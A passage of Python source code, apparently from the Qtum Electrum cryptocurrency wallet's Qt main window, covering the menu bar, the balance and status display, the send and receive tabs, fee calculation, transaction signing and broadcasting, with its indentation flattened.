item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.console_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.smart_contract_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"),
lambda: open_browser("https://github.com/qtumproject/qtum-electrum/"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: open_browser("http://docs.electrum.org/")).setShortcut(
QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
# help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('qtum:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Qtum Electrum",
_("Version") +" %s" % (self.wallet.electrum_version) + "\n\n" +
_(
"This software is based on Electrum to support Qtum. Qtum Electrum's focus is speed, with low resource usage and simplifying Qtum. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/qtumproject/qtum-electrum/issues\">https://github.com/qtumproject/qtum-electrum/issues</a><br></br>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Qtum Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
            # Combine the transactions if there are three or more
tx_amount = len(self.tx_notifications)
if(tx_amount >= 3):
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
total_amount += v
self.notify(_("%(txs)s new transactions received. Total amount received in the new transactions %(amount)s") \
% { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)})
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
self.notify(_("New transaction received. %(amount)s") % { 'amount' : self.format_amount_and_units(v)})
def notify(self, message):
if self.tray:
self.tray.showMessage("Qtum Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount)
if text and x:
text += ' (%s)'%x
return text
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 5:
return 'mQTUM'
if self.decimal_point == 8:
return 'QTUM'
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(BLACK_FG)
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if not rate or rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(BLUE_FG)
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(BLUE_FG)
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging (%d blocks)"%server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance") + ": %s " % (self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]" % (self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]" % (self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.token_balance_list.update()
self.token_hist_list.update()
self.smart_contract_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return self.create_list_tab(l, l.create_toolbar())
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _(
            'Qtum address where the payment should be received. Note that each payment request uses a different Qtum address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Qtum addresses.'),
_('The Qtum address never expires and will always be part of this wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req, self.config)
except Exception as e:
traceback.print_exc(file=sys.stderr)
self.show_error(_('Error adding payment request') + ':\n' + str(e))
else:
self.sign_payment_request(addr)
self.save_request_button.setEnabled(False)
finally:
self.request_list.update()
self.address_list.update()
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n' \
+ _(
'You may enter a QTUM address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Qtum address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _(
'Qtum transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n' \
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n' \
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
self.fee_e = BTCAmountEdit(self.get_decimal_point)
if not self.config.get('show_fee', False):
self.fee_e.setVisible(False)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
self.rbf_checkbox = QCheckBox(_('Replaceable'))
msg = [_('If you check this box, your transaction will be marked as non-final,'),
               _('and you will have the possibility, while it is unconfirmed, to replace it with a transaction that pays a higher fee.'),
_('Note that some merchants do not accept non-final transactions until they are confirmed.')]
self.rbf_checkbox.setToolTip('<p>' + ' '.join(msg) + '</p>')
self.rbf_checkbox.setVisible(False)
grid.addWidget(self.fee_e_label, 5, 0)
grid.addWidget(self.fee_slider, 5, 1)
grid.addWidget(self.fee_e, 5, 2)
grid.addWidget(self.rbf_checkbox, 5, 3)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color, fee_color = RED_FG, RED_FG
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
elif self.fee_e.isModified():
amt_color, fee_color = BLACK_FG, BLACK_FG
elif self.amount_e.isModified():
amt_color, fee_color = BLACK_FG, BLUE_FG
else:
amt_color, fee_color = BLUE_FG, BLUE_FG
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color)
self.fee_e.setStyleSheet(fee_color)
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.config.get('offline') and self.config.is_dynfee() and not self.config.has_fee_estimates():
self.statusBar().showMessage(_('Waiting for fee estimates...'))
return False
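        # A manually entered fee is kept as-is; the transaction is still rebuilt to
        # check whether the available funds are sufficient.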
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee,
is_sweep=is_sweep)
self.not_enough_funds = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except BaseException:
return
if not freeze_fee:
fee = None if self.not_enough_funds else tx.get_fee()
self.fee_e.setAmount(fee)
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
if fee is None:
return
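        # rbf_policy: 0 = always mark the transaction replaceable, 1 = decide from the
        # current fee rate, 2 = never mark it replaceable.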
rbf_policy = self.config.get('rbf_policy', 1)
if rbf_policy == 0:
b = True
elif rbf_policy == 1:
fee_rate = fee * 1000 / tx.estimated_size()
try:
c = self.config.reverse_dynfee(fee_rate)
b = c in [-1, 25]
except:
b = False
elif rbf_policy == 2:
b = False
self.rbf_checkbox.setVisible(b)
self.rbf_checkbox.setChecked(b)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
            msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.') % alias + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Qtum Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Qtum Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
fee = self.fee_e.get_amount() if freeze_fee else None
coins = self.get_coins()
return outputs, fee, label, coins
def do_preview(self):
self.do_send(preview=True)
def do_send(self, preview=False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee, is_sweep=is_sweep)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.rbf_checkbox.isChecked()
tx.set_rbf(use_rbf)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# call hook to see if plugin needs gui interaction
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
